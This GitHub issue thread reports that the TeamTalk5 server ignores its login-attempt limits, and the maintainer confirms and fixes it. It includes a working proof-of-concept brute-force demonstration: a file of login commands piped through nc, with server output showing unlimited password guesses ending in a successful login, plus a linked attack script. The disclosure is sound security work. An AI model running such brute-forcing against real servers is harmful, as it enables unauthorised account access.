### ISSUE TITLE
TeamTalk server login brute-force

### ISSUE THREAD

**Issue by bcoles** [BearWare/TeamTalk5#309]
The TeamTalk server appears to be vulnerable to brute-force login attacks.

The `login-attempts` and `max-logins-per-ipaddr` directives in the configuration file appear to be ignored.

* The `login-attempts` directive does not forcibly disconnect clients after the specified number of login attempts.
* The `max-logins-per-ipaddr` directive does not block IP addresses.

Tested on TeamTalk versions 5.2.2.4885 and 5.2.3.4893.

As a result, it is possible to try an unlimited number of passwords using a single socket connection.

The following demonstrates this issue:

```
$ cat tt
login username=user password=123
login username=user password=456
login username=user password=789
login username=user password=abc
login username=user password=def
login username=user password=ghi
login username=user password=jkl
login username=user password=mno
login username=user password=pqr
login username=user password=stu
login username=user password=vwx
login username=user password=yz
login username=user password=password
login username=user password=test1
login username=user password=test2
login username=user password=test3
```

```
$ nc 172.16.191.166 10333 < tt
teamtalk userid=298 servername="myserver" maxusers=1000 maxiplogins=3 usertimeout=60 protocol="5.2"
error number=2002 message="Invalid user account"
error number=2002 message="Invalid user account"
error number=2002 message="Invalid user account"
error number=2002 message="Invalid user account"
error number=2002 message="Invalid user account"
error number=2002 message="Invalid user account"
error number=2002 message="Invalid user account"
error number=2002 message="Invalid user account"
error number=2002 message="Invalid user account"
error number=2002 message="Invalid user account"
error number=2002 message="Invalid user account"
error number=2002 message="Invalid user account"
accepted userid=298 nickname="" ipaddr="172.16.191.226" username="user" usertype=2 userdata=0 userrights=262143 note="" initchan="" opchannels=[] audiocodeclimit=0
serverupdate servername="myserver" maxusers=1000 maxiplogins=3 usertimeout=60 motd="mymotd" motdraw="mymotd" maxloginattempts=3 autosave=1 tcpport=10333 udpport=10333 voicetxlimit=0 videotxlimit=0 mediafiletxlimit=0 desktoptxlimit=0 totaltxlimit=0 version="5.2.3.4893"
addchannel channel="/" chanid=1 parentid=0 password="" oppassword="" protected=0 topic="" operators=[] diskquota=0 maxusers=1000 type=1 userdata=0 audiocodec=[3,48000,1,2048,10,1,0,32000,1,0,1920] audiocfg=[0,0]
loggedin userid=298 nickname="" username="user" ipaddr="172.16.191.226" statusmode=0 statusmsg="" version="" packetprotocol=0 usertype=2 sublocal=271 subpeer=271 userdata=0 clientname=""
ok
error number=3001 message="Already logged in"
error number=3001 message="Already logged in"
error number=3001 message="Already logged in"
```

Note the server returns `maxiplogins=3` in the banner, however this is clearly ignored, as demonstrated by the 10+ subsequent failed login attempts, followed by a successful login.

The following proof of concept script is available to demonstrate this issue.

* [brute-teamtalk.rb](https://gist.github.com/bcoles/693ab5e82f52174caa6c8ff544e20a61)

With this script it was possible to try approximately 185,000 passwords in 90 seconds using 5 threads on a LAN connection.

**Comment by bear101** [comment]
Hm, yes, it seems the brute force login check has been broken since v5.2. It's when the server API was introduced in TeamTalk SDK.

**Comment by bear101** [comment]
Fixed in v5.2.3.4897
